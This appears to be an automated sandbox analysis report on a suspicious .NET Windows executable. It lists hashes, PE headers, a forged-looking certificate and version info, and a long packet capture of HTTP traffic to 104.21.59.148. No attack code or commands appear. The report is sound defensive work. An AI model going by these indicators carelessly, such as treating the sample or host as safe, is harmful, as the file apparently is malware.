                                                                                                                                                                                        SHA256:32bdc406f8f2c4f9133a41e9c6e1c56aaad679c36a797ac857334779822a723e
                                                                                                                                                                                        SHA512:ed99ddc3f3b3eeb5dabe7ae49e1e1b24c89d8a8d297fc39c0c02dc116d364d3ce91edcbc2ec3232ca0fa65e48a1db662784198a6b6cedfaf98acc6a95fea7a6f
                                                                                                                                                                                        SSDEEP:384:z+u/renYPlzY8xULh+cSUee3C0EP6qVY12HAh7z1X:zVCn8Z+LEU7y0EP6qVY12gh7z1X
                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...yX............"...0..&..........^D... ...`....@.. ....................................@................................

                                                                                                                                                                                        File Icon

                                                                                                                                                                                        Icon Hash:00828e8e8686b000

                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                        General

                                                                                                                                                                                        Entrypoint:0x40445e
                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                        Time Stamp:0xFABC5879 [Sun Apr 22 01:10:17 2103 UTC]
                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                        CLR (.Net) Version:v4.0.30319
                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                        Authenticode Signature

                                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                                        Signature Issuer:C=KdqnEXvJEvWcDM, S=aQHrKGRgDAhxXL, L=cNnIrJyzcqiPsAvjDsEdBebDEbvUBHGDtwxsGQsBty, T=eChRNCJEvAgTyKkSYdgPgdhnpgVfkY, E=KTKczRgwypTZHzRiOsiXTgxkVGtvmFrQSRtObBdcOWzhisL, OU=eHLDCTiluPbhZkVLWkWAC, O=GrbDyUsVcgeBmdFDrXCBNsu, CN=CGsLCQHMZbqNJHpGEvGIzbOtFofZGHmgXfvxtaR
                                                                                                                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                        Error Number:-2146762487
                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                        • 3/1/2021 10:34:38 PM 3/1/2022 10:34:38 PM
                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                        • C=KdqnEXvJEvWcDM, S=aQHrKGRgDAhxXL, L=cNnIrJyzcqiPsAvjDsEdBebDEbvUBHGDtwxsGQsBty, T=eChRNCJEvAgTyKkSYdgPgdhnpgVfkY, E=KTKczRgwypTZHzRiOsiXTgxkVGtvmFrQSRtObBdcOWzhisL, OU=eHLDCTiluPbhZkVLWkWAC, O=GrbDyUsVcgeBmdFDrXCBNsu, CN=CGsLCQHMZbqNJHpGEvGIzbOtFofZGHmgXfvxtaR
                                                                                                                                                                                        Version:3
                                                                                                                                                                                        Thumbprint MD5:E10476804635D5199F5472276046F305
                                                                                                                                                                                        Thumbprint SHA-1:DEAC1BBF35C992C1B95049E0D60034710DDE008A
                                                                                                                                                                                        Thumbprint SHA-256:765E7B311A0CAD32BD94CFA4648B89D3C954AE59A698A3AC4EB74D0A149D702B
                                                                                                                                                                                        Serial:00AAE37FE6776D6CF933BC64B4955F7523

                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                        Instruction
                                                                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al

                                                                                                                                                                                        Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x440c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6000 | 0x448 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x3000 | 0x14d0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                                                                                                                        Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x2464 | 0x2600 | False | 0.542454769737 | data | 5.47042980648 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x6000 | 0x448 | 0x600 | False | 0.317708333333 | data | 3.91990224854 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x8000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                        Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x6058 | 0x3f0 | SysEx File - OctavePlateau | English | United States

                                                                                                                                                                                        Imports

DLL | Import
mscoree.dll | _CorExeMain

                                                                                                                                                                                        Version Infos

Description | Data
LegalCopyright | 2017 get_InitialCatalog
Assembly Version | 4.7.0.0
InternalName | get_EditedFormattedValue.exe
FileVersion | 2.7.0.3
CompanyName | IAssemblyRefFinder
LegalTrademarks | tagDBBINDING
Comments | DisplayedBandsData
ProductName | get_EditedFormattedValue
ProductVersion | 4.7.0.0
FileDescription | GZipConstants
OriginalFilename | get_EditedFormattedValue.exe
Translation | 0x0409 0x0514

                                                                                                                                                                                        Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                        TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                        Mar 2, 2021 20:41:05.779882908 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.779988050 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.780006886 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.780164003 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.780199051 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.780662060 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.780685902 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.781562090 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.781586885 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.781708002 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.781722069 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.782469988 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.782493114 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.782645941 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.783368111 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.783385038 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.783524036 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.784265041 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.784292936 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.784404993 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.785166979 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.785190105 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.785851002 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.786048889 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.786072969 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.786195040 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.787034035 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.787058115 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.787240028 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.787827969 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.787849903 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.787947893 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.788739920 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.788762093 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.789459944 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.818111897 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.818324089 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.818586111 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.818605900 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.818674088 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.818692923 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.819489002 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.819511890 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.820425034 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.820446014 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.820523977 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.820530891 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.821706057 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.821728945 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.821748972 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.821793079 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.822640896 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.822664022 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.823503017 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.823527098 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.823577881 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.823584080 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.824414015 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.824436903 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.826289892 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.859772921 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.859802008 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.859914064 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.860136032 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.860156059 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.860594034 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.861063004 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.861084938 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.861356020 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.861939907 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.861963034 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.862054110 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.862838030 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.862868071 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.862962008 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.863744974 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.863770008 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.864677906 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.864701033 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.864762068 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.864768982 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.865556955 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.866298914 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.866339922 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.866452932 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.866471052 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.866761923 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.867311954 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.867340088 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.868195057 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.868216991 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.868274927 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.868280888 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.869075060 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.869096994 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.869995117 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.870021105 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.870110989 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.870119095 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.870966911 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.870995045 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.871819973 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.871843100 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.871900082 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.871906996 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.872694016 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.872718096 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.873400927 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.873570919 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.873591900 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.873677015 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.874478102 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.995794058 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.996388912 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.996419907 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.996515036 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.997188091 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.997216940 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.997292042 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.998482943 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.024151087 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.024178028 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.024194956 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.024483919 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.024542093 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.024564981 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.024580002 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.025378942 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.025414944 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.025443077 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.025473118 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.025499105 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.025506973 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.026222944 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.026246071 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.026268005 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.026309013 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.027049065 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.027075052 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.027093887 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.027153015 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.027173042 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.027863979 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.027887106 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.027903080 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.028367996 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.028706074 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.028728008 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.028743982 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.028821945 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.028856039 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.029567003 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.029589891 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.029608965 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.030422926 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.030445099 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.030461073 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.030515909 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.030544996 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.030551910 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.031232119 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.031253099 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.031270027 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.032058001 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.032084942 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.032110929 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.032126904 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.032193899 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.032217026 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.032951117 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.032967091 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.032984018 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.033740044 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.033767939 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.033787012 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.033847094 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.033875942 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.033898115 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.034548998 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.034571886 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.034595966 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.034650087 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.035396099 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.035419941 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.035434008 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.035527945 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.035553932 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.036267996 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.036289930 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.036307096 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.036428928 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.037079096 CET8049729104.21.59.148192.168.2.6
